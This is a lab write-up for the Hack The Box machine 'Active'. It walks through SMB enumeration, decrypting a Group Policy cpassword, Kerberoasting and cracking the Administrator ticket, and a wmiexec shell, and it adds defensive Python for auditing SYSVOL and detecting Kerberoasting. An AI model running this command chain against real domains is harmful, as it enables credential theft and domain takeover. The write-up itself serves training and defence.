Active

Enumeration

Defining a helper variable containing the IP and doing some basic enumeration:

export ip=10.10.10.100
ping $ip # TTL 127 - windows?
nmap -p- $ip # port 
nmap -p- -sC -sV $ip
# Apache http2.4.51

Ports:

| Port | Service | Notes |
|---|---|---|
| 53 | domain | Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1) |
| 135 | msrpc | Microsoft Windows RPC |
| 139 | netbios-ssn | Microsoft Windows netbios-ssn |
| 389 | ldap | Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name) |
| 445 | - | microsoft-ds? |
| 464 | - | kpasswd5? |
| 593 | ncacn_http | Microsoft Windows RPC over HTTP 1.0 |
| 636 | tcpwrapped | - |
| 3268 | ldap | Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name) |
| 3269 | tcpwrapped | - |
| 5722 | msrpc | Microsoft Windows RPC |
| 9389 | mc-nmf | .NET Message Framing |
| 47001 | http | Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |
| 49152-49155 | msrpc | Microsoft Windows RPC |
| 49157 | ncacn_http | Microsoft Windows RPC over HTTP 1.0 |
| 49158 | msrpc | Microsoft Windows RPC |
| 49165 | msrpc | Microsoft Windows RPC |
| 49168-49169 | msrpc | Microsoft Windows RPC |

samba

Enumerate the samba service with:

enum4linux -a $ip

Shares:

| Share | Mapping | Listing | Comment |
|---|---|---|---|
| ADMIN$ | DENIED | N/A | Remote Admin |
| C$ | DENIED | N/A | Default share |
| IPC$ | OK | DENIED | Remote IPC |
| NETLOGON | DENIED | N/A | Logon server share |
| Replication | OK | OK | - |
| SYSVOL | DENIED | N/A | Logon server share |
| Users | DENIED | N/A | - |

Checking out the anonymous share:

smbclient //$ip/Replication

mask ""
recurse
prompt
mget *
exit

cd active.htb
ranger

Found an encrypted password in `active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml`:

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
    <Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/>
  </User>
</Groups>

The `cpassword` value can be decrypted with gpp-decrypt, giving a credential for the user active.htb\SVC_TGS:

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
# GPPstillStandingStrong2k18
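The reason gpp-decrypt works is that every Group Policy Preference `cpassword` is AES-256-CBC ciphertext under a single key Microsoft published in MSDN, so any such attribute left in SYSVOL is effectively a cleartext credential readable by every domain user. MS14-025 stopped Windows from writing new ones but did not remove existing entries. The following is an added example, not part of the original writeup, that does the defender's half of this step: it walks a SYSVOL copy, parses every GPP XML file type that can carry credentials (Groups, Services, ScheduledTasks, DataSources, Printers, Drives) and reports each `cpassword` it finds. The Groups.xml from the Replication share above is embedded as the constructed sample input so it runs offline; the `demo()` directory layout mirrors the path from the box.

```python
"""Audit a SYSVOL tree for Group Policy Preference cpassword leftovers.

Added example, not from the original writeup. Walks a SYSVOL-style directory,
parses each GPP XML file that can carry credentials and reports every element
that still has a cpassword attribute. The Groups.xml recovered from the box is
embedded below as constructed sample input so the script runs offline.
"""
import os
import tempfile
import xml.etree.ElementTree as ET

# GPP files that can carry a cpassword attribute (compared case-insensitively).
GPP_FILES = {"groups.xml", "services.xml", "scheduledtasks.xml",
             "datasources.xml", "printers.xml", "drives.xml"}

# Constructed sample: the Groups.xml from the Replication share, verbatim.
SAMPLE_GROUPS_XML = r"""<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
"""


def find_cpasswords(xml_data, source="<memory>"):
    """Return one finding per element carrying a cpassword attribute.

    The value is AES-256-CBC ciphertext under the key Microsoft published, so
    for reporting purposes it is as good as plaintext. An empty cpassword
    means the preference sets a blank password, which is worth a report too.
    """
    if isinstance(xml_data, str):
        xml_data = xml_data.encode("utf-8")
    root = ET.fromstring(xml_data)
    findings = []
    for parent in root.iter():          # e.g. <User>, <Service>, <Task>
        for child in parent:            # the <Properties> child holds cpassword
            cpw = child.get("cpassword")
            if cpw is None:
                continue
            findings.append({
                "file": source,
                "item": parent.tag,
                "name": parent.get("name", ""),
                "changed": parent.get("changed", ""),
                # The account attribute differs per file type: Groups uses
                # userName, Services accountName, ScheduledTasks runAs.
                "account": child.get("userName") or child.get("accountName")
                           or child.get("runAs") or "",
                "cpassword": cpw,
            })
    return findings


def scan_sysvol(root_dir):
    """Walk root_dir (a SYSVOL copy) and collect cpassword findings from GPP XML."""
    findings = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for fname in files:
            if fname.lower() not in GPP_FILES:
                continue
            path = os.path.join(dirpath, fname)
            with open(path, "rb") as fh:
                data = fh.read()
            try:
                findings.extend(find_cpasswords(data, source=path))
            except ET.ParseError:
                # A malformed file deserves a manual look but must not stop the sweep.
                findings.append({"file": path, "item": "PARSE_ERROR", "name": "",
                                 "changed": "", "account": "", "cpassword": ""})
    return findings


def demo():
    """Build a SYSVOL-shaped temp tree holding the sample file and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        gpp_dir = os.path.join(tmp, "active.htb", "Policies",
                               "{31B2F340-016D-11D2-945F-00C04FB984F9}",
                               "MACHINE", "Preferences", "Groups")
        os.makedirs(gpp_dir)
        with open(os.path.join(gpp_dir, "Groups.xml"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_GROUPS_XML)
        return scan_sysvol(tmp)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['file']}: {f['item']} {f['name']!r} account={f['account']!r} "
              f"changed={f['changed']} cpassword={f['cpassword'][:12]}...")
```

Pointing `scan_sysvol()` at a mounted `\\dc\SYSVOL` share or an offline copy gives the full list; each hit should be removed from the policy and the affected account's password rotated, since the `changed` timestamp (2018 here) only tells you how long the credential has been exposed, not who has already read it.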

And back to enumeration with the recovered credential:

enum4linux -u SVC_TGS -p GPPstillStandingStrong2k18 -a $ip
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Jul 19 04:40:28 2023

 =========================================( Target Information )=========================================

Target ........... 10.10.10.100
RID Range ........ 500-550,1000-1050
Username ......... 'SVC_TGS'
Password ......... 'GPPstillStandingStrong2k18'
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ============================( Enumerating Workgroup/Domain on 10.10.10.100 )============================


[E] Can't find workgroup/domain



 ================================( Nbtstat Information for 10.10.10.100 )================================

Looking up status of 10.10.10.100
No reply from 10.10.10.100

 ===================================( Session Check on 10.10.10.100 )===================================


[+] Server 10.10.10.100 allows sessions using username 'SVC_TGS', password 'GPPstillStandingStrong2k18'


 ================================( Getting domain SID for 10.10.10.100 )================================

Domain Name: ACTIVE
Domain Sid: S-1-5-21-405608879-3187717380-1996298813

[+] Host is part of a domain (not a workgroup)


 ===================================( OS information on 10.10.10.100 )===================================


[E] Can't get OS info with smbclient


[+] Got OS info for 10.10.10.100 from srvinfo: 
	10.10.10.100   Wk Sv PDC Tim NT     Domain Controller
	platform_id     :	500
	os version      :	6.1
	server type     :	0x80102b


 =======================================( Users on 10.10.10.100 )=======================================

index: 0xdea RID: 0x1f4 acb: 0x00000210 Account: Administrator	Name: (null)	Desc: Built-in account for administering the computer/domain
index: 0xdeb RID: 0x1f5 acb: 0x00000215 Account: Guest	Name: (null)	Desc: Built-in account for guest access to the computer/domain
index: 0xe19 RID: 0x1f6 acb: 0x00020011 Account: krbtgt	Name: (null)	Desc: Key Distribution Center Service Account
index: 0xeb2 RID: 0x44f acb: 0x00000210 Account: SVC_TGS	Name: SVC_TGS	Desc: (null)

user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[SVC_TGS] rid:[0x44f]

 =================================( Share Enumeration on 10.10.10.100 )=================================

do_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	Replication     Disk      
	SYSVOL          Disk      Logon server share 
	Users           Disk      
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 10.10.10.100

//10.10.10.100/ADMIN$	Mapping: DENIED Listing: N/A Writing: N/A
//10.10.10.100/C$	Mapping: DENIED Listing: N/A Writing: N/A

[E] Can't understand response:

NT_STATUS_INVALID_PARAMETER listing \*
//10.10.10.100/IPC$	Mapping: N/A Listing: N/A Writing: N/A
//10.10.10.100/NETLOGON	Mapping: OK Listing: OK Writing: N/A
//10.10.10.100/Replication	Mapping: OK Listing: OK Writing: N/A
//10.10.10.100/SYSVOL	Mapping: OK Listing: OK Writing: N/A
//10.10.10.100/Users	Mapping: OK Listing: OK Writing: N/A

 ============================( Password Policy Information for 10.10.10.100 )============================



[+] Attaching to 10.10.10.100 using SVC_TGS:GPPstillStandingStrong2k18

[+] Trying protocol 139/SMB...

	[!] Protocol failed: Cannot request session (Called Name:10.10.10.100)

[+] Trying protocol 445/SMB...

[+] Found domain(s):

	[+] ACTIVE
	[+] Builtin

[+] Password Info for Domain: ACTIVE

	[+] Minimum password length: 7
	[+] Password history length: 24
	[+] Maximum password age: 41 days 23 hours 53 minutes 
	[+] Password Complexity Flags: 000001

		[+] Domain Refuse Password Change: 0
		[+] Domain Password Store Cleartext: 0
		[+] Domain Password Lockout Admins: 0
		[+] Domain Password No Clear Change: 0
		[+] Domain Password No Anon Change: 0
		[+] Domain Password Complex: 1

	[+] Minimum password age: 1 day 4 minutes 
	[+] Reset Account Lockout Counter: 30 minutes 
	[+] Locked Account Duration: 30 minutes 
	[+] Account Lockout Threshold: None
	[+] Forced Log off Time: Not Set



[+] Retieved partial password policy with rpcclient:


Password Complexity: Enabled
Minimum Password Length: 7


 =======================================( Groups on 10.10.10.100 )=======================================


[+] Getting builtin groups:

group:[Server Operators] rid:[0x225]
group:[Account Operators] rid:[0x224]
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]

[+]  Getting builtin group memberships:

Group: Windows Authorization Access Group' (RID: 560) has member: NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS
Group: Pre-Windows 2000 Compatible Access' (RID: 554) has member: NT AUTHORITY\Authenticated Users
Group: Guests' (RID: 546) has member: ACTIVE\Guest
Group: Guests' (RID: 546) has member: ACTIVE\Domain Guests
Group: Users' (RID: 545) has member: NT AUTHORITY\INTERACTIVE
Group: Users' (RID: 545) has member: NT AUTHORITY\Authenticated Users
Group: Users' (RID: 545) has member: ACTIVE\Domain Users
Group: Administrators' (RID: 544) has member: ACTIVE\Administrator
Group: Administrators' (RID: 544) has member: ACTIVE\Enterprise Admins
Group: Administrators' (RID: 544) has member: ACTIVE\Domain Admins
Group: IIS_IUSRS' (RID: 568) has member: NT AUTHORITY\IUSR

[+]  Getting local groups:

group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44d]

[+]  Getting local group memberships:

Group: Denied RODC Password Replication Group' (RID: 572) has member: ACTIVE\krbtgt
Group: Denied RODC Password Replication Group' (RID: 572) has member: ACTIVE\Domain Controllers
Group: Denied RODC Password Replication Group' (RID: 572) has member: ACTIVE\Schema Admins
Group: Denied RODC Password Replication Group' (RID: 572) has member: ACTIVE\Enterprise Admins
Group: Denied RODC Password Replication Group' (RID: 572) has member: ACTIVE\Cert Publishers
Group: Denied RODC Password Replication Group' (RID: 572) has member: ACTIVE\Domain Admins
Group: Denied RODC Password Replication Group' (RID: 572) has member: ACTIVE\Group Policy Creator Owners
Group: Denied RODC Password Replication Group' (RID: 572) has member: ACTIVE\Read-only Domain Controllers

[+]  Getting domain groups:

group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[DnsUpdateProxy] rid:[0x44e]

[+]  Getting domain group memberships:

Group: 'Enterprise Admins' (RID: 519) has member: ACTIVE\Administrator
Group: 'Schema Admins' (RID: 518) has member: ACTIVE\Administrator
Group: 'Domain Admins' (RID: 512) has member: ACTIVE\Administrator
Group: 'Domain Guests' (RID: 514) has member: ACTIVE\Guest
Group: 'Group Policy Creator Owners' (RID: 520) has member: ACTIVE\Administrator
Group: 'Domain Users' (RID: 513) has member: ACTIVE\Administrator
Group: 'Domain Users' (RID: 513) has member: ACTIVE\krbtgt
Group: 'Domain Users' (RID: 513) has member: ACTIVE\SVC_TGS
Group: 'Domain Controllers' (RID: 516) has member: ACTIVE\DC$

 ==================( Users on 10.10.10.100 via RID cycling (RIDS: 500-550,1000-1050) )==================


[I] Found new SID: 
S-1-5-21-405608879-3187717380-1996298813

[I] Found new SID: 
S-1-5-21-405608879-3187717380-1996298813

[I] Found new SID: 
S-1-5-32

[I] Found new SID: 
S-1-5-32

[I] Found new SID: 
S-1-5-32

[I] Found new SID: 
S-1-5-32

[I] Found new SID: 
S-1-5-32

[I] Found new SID: 
S-1-5-32

[I] Found new SID: 
S-1-5-32

[+] Enumerating users using SID S-1-5-21-405608879-3187717380-1996298813 and logon username 'SVC_TGS', password 'GPPstillStandingStrong2k18'

S-1-5-21-405608879-3187717380-1996298813-500 ACTIVE\Administrator (Local User)
S-1-5-21-405608879-3187717380-1996298813-501 ACTIVE\Guest (Local User)
S-1-5-21-405608879-3187717380-1996298813-502 ACTIVE\krbtgt (Local User)
S-1-5-21-405608879-3187717380-1996298813-512 ACTIVE\Domain Admins (Domain Group)
S-1-5-21-405608879-3187717380-1996298813-513 ACTIVE\Domain Users (Domain Group)
S-1-5-21-405608879-3187717380-1996298813-514 ACTIVE\Domain Guests (Domain Group)
S-1-5-21-405608879-3187717380-1996298813-515 ACTIVE\Domain Computers (Domain Group)
S-1-5-21-405608879-3187717380-1996298813-516 ACTIVE\Domain Controllers (Domain Group)
S-1-5-21-405608879-3187717380-1996298813-517 ACTIVE\Cert Publishers (Local Group)
S-1-5-21-405608879-3187717380-1996298813-518 ACTIVE\Schema Admins (Domain Group)
S-1-5-21-405608879-3187717380-1996298813-519 ACTIVE\Enterprise Admins (Domain Group)
S-1-5-21-405608879-3187717380-1996298813-520 ACTIVE\Group Policy Creator Owners (Domain Group)
S-1-5-21-405608879-3187717380-1996298813-521 ACTIVE\Read-only Domain Controllers (Domain Group)
S-1-5-21-405608879-3187717380-1996298813-1000 ACTIVE\DC$ (Local User)

[+] Enumerating users using SID S-1-5-80-3139157870-2983391045-3678747466-658725712 and logon username 'SVC_TGS', password 'GPPstillStandingStrong2k18'

[+] Enumerating users using SID S-1-5-21-1621100029-2620511771-2725732389 and logon username 'SVC_TGS', password 'GPPstillStandingStrong2k18'

S-1-5-21-1621100029-2620511771-2725732389-500 DC\Administrator (Local User)
S-1-5-21-1621100029-2620511771-2725732389-501 DC\Guest (Local User)
S-1-5-21-1621100029-2620511771-2725732389-513 DC\None (Domain Group)

[+] Enumerating users using SID S-1-5-32 and logon username 'SVC_TGS', password 'GPPstillStandingStrong2k18'

S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)

[+] Enumerating users using SID S-1-5-80 and logon username 'SVC_TGS', password 'GPPstillStandingStrong2k18'


 ===============================( Getting printer info for 10.10.10.100 )===============================

do_cmd: Could not initialise spoolss. Error was NT_STATUS_OBJECT_NAME_NOT_FOUND

Inspecting the report, it's now possible to access the `SYSVOL`, `Users` and `NETLOGON` shares with the credential:

smbclient //$ip/SYSVOL --user SVC_TGS%GPPstillStandingStrong2k18
# Looks the same as Replication
smbclient //$ip/Users --user SVC_TGS%GPPstillStandingStrong2k18
# user flag found in \SVC_TGS\Desktop\user.txt
smbclient //$ip/NETLOGON --user SVC_TGS%GPPstillStandingStrong2k18
# empty

Kerberos

msfconsole
use auxiliary/gather/get_user_spns
set rhosts 10.10.10.100
set domain active.htb
set pass GPPstillStandingStrong2k18
set user SVC_TGS
run

This returns a `$krb5tgs$23$` hash (an RC4-encrypted service ticket) for the Administrator account; to crack it with john:

echo "\$krb5tgs\$23\$*Administrator\$ACTIVE.HTB\$active.htb/Administrator*\$d11d9dfc6a77c854f016001cd16de94b\$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" > /tmp/hash
john /tmp/hash --wordlist=/usr/share/wordlists/rockyou.txt
# Ticketmaster1968
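What `get_user_spns` does on the wire is ask the KDC for a service ticket for every account that has an SPN, and the `23` in the hash prefix records that the ticket came back RC4-encrypted (etype 0x17), which is what makes it crackable offline. On the domain controller each of those requests is a Security event 4769, so the pattern a defender looks for is one low-privilege account pulling RC4 service tickets for many distinct services within seconds. The following detection is an added example, not part of the original writeup: it reads 4769 records as JSON lines (the field names are the ones Windows uses; the records, the `svc_*` service names, the `jdoe` user and the IP addresses are constructed for the demo) and alerts on any requester that crosses a distinct-service threshold inside a time window.

```python
"""Detect Kerberoasting from Windows Security event 4769 records.

Added example, not from the original writeup. Flags a requester that obtained
RC4-encrypted (TicketEncryptionType 0x17) service tickets for many distinct
services within a short window. Sample records below are constructed JSON
lines in 4769 field names: TargetUserName is the requester, ServiceName the
account whose ticket was issued.
"""
import json
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"             # etype 23; AES tickets show up as 0x11 / 0x12
DISTINCT_SPN_THRESHOLD = 3    # small for the demo; tune per environment
WINDOW = timedelta(minutes=5)

SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    # the roast: one account, three different services, RC4, within seconds
    {"EventID": 4769, "TimeCreated": "2023-07-19T04:45:01", "TargetUserName": "SVC_TGS@ACTIVE.HTB",
     "ServiceName": "Administrator", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.5"},
    {"EventID": 4769, "TimeCreated": "2023-07-19T04:45:02", "TargetUserName": "SVC_TGS@ACTIVE.HTB",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.5"},
    {"EventID": 4769, "TimeCreated": "2023-07-19T04:45:02", "TargetUserName": "SVC_TGS@ACTIVE.HTB",
     "ServiceName": "svc_web", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.5"},
    # krbtgt renewals and machine-account tickets are routine and are skipped
    {"EventID": 4769, "TimeCreated": "2023-07-19T04:45:03", "TargetUserName": "SVC_TGS@ACTIVE.HTB",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.5"},
    {"EventID": 4769, "TimeCreated": "2023-07-19T04:47:00", "TargetUserName": "DC$@ACTIVE.HTB",
     "ServiceName": "DC$", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.10.100"},
    # an ordinary user: one AES ticket, then one lone RC4 ticket an hour later
    {"EventID": 4769, "TimeCreated": "2023-07-19T04:46:00", "TargetUserName": "jdoe@ACTIVE.HTB",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.10.50"},
    {"EventID": 4769, "TimeCreated": "2023-07-19T05:46:00", "TargetUserName": "jdoe@ACTIVE.HTB",
     "ServiceName": "Administrator", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.10.50"},
    # a 4768 (TGT request) on the same feed is ignored by the parser
    {"EventID": 4768, "TimeCreated": "2023-07-19T04:44:59", "TargetUserName": "SVC_TGS",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.5"},
])


def parse_4769(text):
    """Yield 4769 records from JSON lines with a parsed timestamp; skip junk."""
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue
        if ev.get("EventID") != 4769:
            continue
        ev["ts"] = datetime.fromisoformat(ev["TimeCreated"])
        yield ev


def detect_kerberoasting(text, threshold=DISTINCT_SPN_THRESHOLD, window=WINDOW):
    """Map requester -> sorted services for anyone who pulled RC4 tickets for
    at least `threshold` distinct services inside any `window`-long span."""
    rc4_requests = defaultdict(list)
    for ev in parse_4769(text):
        if str(ev.get("TicketEncryptionType", "")).lower() != RC4_HMAC:
            continue
        svc = ev.get("ServiceName", "")
        if svc.lower() == "krbtgt" or svc.endswith("$"):
            continue                      # TGT renewals / computer accounts
        rc4_requests[ev["TargetUserName"]].append((ev["ts"], svc))

    alerts = {}
    for user, reqs in rc4_requests.items():
        reqs.sort()
        # Sliding window over time-ordered requests: quadratic, but per-user
        # RC4 volume is small once krbtgt and machine tickets are removed.
        for i, (start, _svc) in enumerate(reqs):
            seen = {s for ts, s in reqs[i:] if ts - start <= window}
            if len(seen) >= threshold:
                alerts[user] = sorted(seen)
                break
    return alerts


if __name__ == "__main__":
    for user, services in detect_kerberoasting(SAMPLE_EVENTS).items():
        print(f"ALERT possible Kerberoasting by {user}: {', '.join(services)}")
```

The encryption type is a useful but not sufficient signal: accounts with AES keys can be roasted with AES tickets too, so the durable indicator is the distinct-service count per requester, and a decoy account with an SPN that no legitimate client ever requests turns any 4769 for it into a high-confidence alert. On the hardening side, the page's own result shows why the Administrator account should never carry an SPN and why service accounts need long random passwords (or gMSA) rather than something rockyou.txt can recover.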

WmiExec

To continue, impacket's wmiexec can be used to gain a very simple, unstable shell:

git clone https://github.com/fortra/impacket
cd impacket/examples
./wmiexec.py active.htb/administrator:Ticketmaster1968@10.10.10.100
cd Users
cd Administrator
cd Desktop
lget root.txt
exit